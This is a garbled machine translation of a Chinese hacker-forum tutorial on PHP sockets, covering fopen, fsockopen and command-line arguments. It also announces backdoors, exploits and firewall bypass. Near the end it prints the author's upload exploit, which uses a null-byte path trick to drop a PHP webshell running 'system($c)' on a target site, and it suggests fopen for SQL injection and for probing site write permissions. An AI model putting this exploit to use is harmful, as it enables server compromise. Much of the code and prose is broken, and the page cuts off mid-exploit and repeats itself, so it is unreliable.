Preliminary programming of PHP-SOCKETS. Author: darkness [bst] msn: cqxy [at] 21cn.net has been learning php2 for many months. but what is different from others is that I prefer socket. there are too few articles on socket in php. so I decided to write a series of authors: darkness [bst]
Msn: cqxy [at] 21cn.net
After learning php2 for a month, I have gained a lot. but what is different from others is that I prefer socket. there are too few articles on socket in php. so I decided to write a series of php-socket reading notes. it has been written from the most basic to socket_raw.
Instance + experience. the instance will have port forwarding (break through the firewall), dynamic network type exp, port scanning, php backdoor, and packet sending type exp framework. you can only write one article per week for study purposes. volume 1 is provided. I hope everyone will join in php shell programming.
Preface:
Php is one of the most popular scripting languages in the world. It has been widely used in web programming. What I want to talk about is that php is not only excellent in web, but also excellent in shell. It's just that people are more accustomed to using perl to write shell scripts. here I declare that I am not a php Master, but I have been in contact with php for only a few weeks. this is just a reading note. If there is any error, please submit it. You can also mail me to discuss php.
Prerequisites:
The most attractive part of php is the sockets extension. In fact, I will simply write a common winsock program using vb. But I still chose php. Because it is cross-platform.
By default, php does not support advanced sockets. it only supports the encapsulated fsockopen functions. As an extension of php, socket must be set to support it. Set php in windows. Ini, in php. Ini search; remove the windows extensions line; Semicolon before extension = php_sockets.dll. That's OK. * In nix, The-enable-sockets command must be added during compilation. When the dl () function is not used, your php must be in the same directory as php_sockets.dll. Now, php socket configuration is complete.
The following are running problems:
It is very easy to run the php script on the terminal. In windows, c: phpphp.exe unzip q test. php. * nix must declare that php is executed in advance in the php file, just like perl. Image #! /Usr/local/bin/php then q., and then try again./test. php. The q parameter means that the php header information is not output.
Input parameter problems:
Some people say how to input parameters in php shell. You can enter parameters like this on the web.
Http://xxx.com/aa.php?Parameter 1 = xxxx & parameter 2 = ssssss. Php has similar parameter functions like perl. Here is the official description.
"Argv"
Parameters passed to the script. When the script runs in the command line mode, the argv variable is passed to the command line parameters in the c language style of the program. When the get method is called, the variable contains the requested data.
"Argc"
Contains the number of command line parameters passed to the program (if it is in command line mode ).
Well, simply put. Let me give you an example.
The following code is used:
<? If ($ argc! = 4 | in_array ($ argc [1], array (-- help,-h ,?))) {Echo "by darkness [bst]. we will come back soon! "; Echo" ---------------------------------------------- "; echo" c:/php/php.exe-q uploadexp. php http://www.bugkidz.org/upload.php target = _ blank> http://www.bugkidz.org/upload.php </a> filepath "; echo" -------------------------------------------------- ";} $ host = $ argv [1]; $ url = $ argv [2]; $ path = $ argv [3];?>
[Ctrl + a Select All]
I think you should have understood it. here argc [0] refers to the program itself. You can also do this.
Print (% s, $ argv [1]);
Spend one hour at noon in the Internet cafe to write this short paragraph
The preceding section describes how to run a command line interface. For more information, see
Http://www.php.net/manual/zh/features.commandline.php
1. fopen application
Fopen can also be called an encapsulated socket function. Not only for file read/write, but also for socket. Fopen is equivalent to the inet control/class in other advanced languages. compared with fsockopen, fopen is more advanced in url operations.
How to use fopen
$ S = fopen ($ url, mode );
Fopen mode attribute:
Mode description
R: open the file in read-only mode and point the file pointer to the file header.
R + read/write mode to open the file pointer to the file header.
W. open the file by writing data, point the file pointer to the file header, and cut the file size to zero. If the file does not exist, try to create it.
Open in w + read/write mode, point the file pointer to the file header, and cut the file size to zero. If the file does not exist, try to create it.
A. open the file by writing the pointer to the end of the file. If the file does not exist, try to create it.
Open in a + read/write mode and point the file pointer to the end of the file. If the file does not exist, try to create it.
X is created and opened in writing mode. the file pointer points to the file header. If the file already exists, fopen () fails to be called, returns false, and generates an e_warning-level error message. If the file does not exist, try to create it. This is equivalent to specifying the o_excl | o_creat mark for the underlying open (2) system call. This option is supported by php 4.3.2 and later versions and can only be used for local files.
X + is created and opened in read/write mode. it points the file pointer to the file header. If the file already exists, fopen () fails to be called, returns false, and generates an e_warning-level error message. If the file does not exist, try to create it. This is equivalent to specifying the o_excl | o_creat mark for the underlying open (2) system call. This option is supported by php 4.3.2 and later versions and can only be used for local files.
That is, it is used for local file operations, or for inet. Is it kool?
If you want to test whether the iis directory of a site has the write permission.
Write like this
$ S = fopen ("
Http://www.bugkidz.org"," X + ") or die (" No write permission exists ")
If yes, you can continue to construct the following statements. Use fwrite to remotely write files.
However, General websites have read-only permissions.
$ S = fopen ("
Http://www.bugkidz.org/index.php? Id = 1"," R ");
This will read
Http://www.bugkidz.org/index.php? Id = 1To obtain the complete file content.
This way
While (! Feof ($ s )){
Echo fgets ($ s, 1024 );
}
I think fopen is the most convenient for SQL injection.
Function phpinet ($ url)
{
Fopen ($ url, "r") or die ("open url error ");
While (! Feof ($ s )){
$ Cahe = fgets ($ s, 1024 );
}
Retrun $ cahe;
Fclose ($ s)
}
This function is equivalent to inet. openurl in vb.
Use of fsockopen functions
Fsockopen is also an encapsulated socket function. similar to the winsock control in VB. unfortunately, it supports Active socket connections and does not support bind and listen. to implement these functions, you must use advanced socket programming in PHP. even so, the fsockopen function can meet most of the requirements.
Use fsockopen in this way
Resource fsockopen (string target, int port [, int errno [, string errstr [, float timeout])
Example:
$ Sock = fsockopen ("192.168.0.1", 80, $ errno, $ errstr, 30 );
The first two are the addresses and ports, the middle two are the variables related to the error, and finally the timeout is set.
Usually $ sock = fsockopen ("192.168.0.1", 80); in this way.
$ Sock = fsockopen ("192.168.0.1", 80); this is a typical TCP connection. UDP connection.
$ Sock = fsockopen ("udp: // 192.168.0.1", 53 );
You can also use this to write a TFTP client.
Fsockopen application example:
Instance 1: Simple HTTP session.
Code
The following code is used:
<? Php $ fp = fsockopen ("www.example.com", 80, $ errno, $ errstr, 30); if (! $ Fp) {echo "$ errstr ($ errno) <br/>";} else {$ out = "get/http/1.1"; $ out. = "host: www.example.com"; $ out. = "connection: close"; fwrite ($ fp, $ out); while (! Feof ($ fp) {echo fgets ($ fp, 128) ;}fclose ($ fp) ;}?>
[Ctrl + a Select All]
The process is generally like this.
Create a fsockopen resource to define the content to be sent. use the fwrite function or fputs function to write the defined content, and output the content in one line until the end of the file is reached. use the fgets function or fread function. use fclose to close the created fsockopen resource.
ANGEL writes a PHP port scanning tool and posts it
Http://www.4ngel.net/article/20.htm
Selecting fsockopen to write simple EXP sending framework is definitely goodidea. becoz its so easy.
View my PHP Upload vulnerability exp.
Code
The following code is used:
<? Php # codz by darkness msn: cqxy [at] 21cn.net $ sock = fsockopen ("www.riririri.com", 80); if (! $ Sock) {echo "cannot connect it! ";}$ Body =" ----------------------------- 7d41f4a600472 ". "content-disposition: form-data; name =" path "". "". "www. ppp % 00 ". "----------------------------- 7d41f4a600472 ". "content-disposition: form-data; name =" image "; filename =" f: \ tools \ 1.gif "". "content-type: text/plain ". "". "<? Php "." system ($ c); "."?> "." ----------------------- </P>
Why msn: cqxy [at] 21cn.net has been learning php2 for many months. but what is different from others is that I prefer socket. there are too few articles on socket in php. so I decided to write a series...
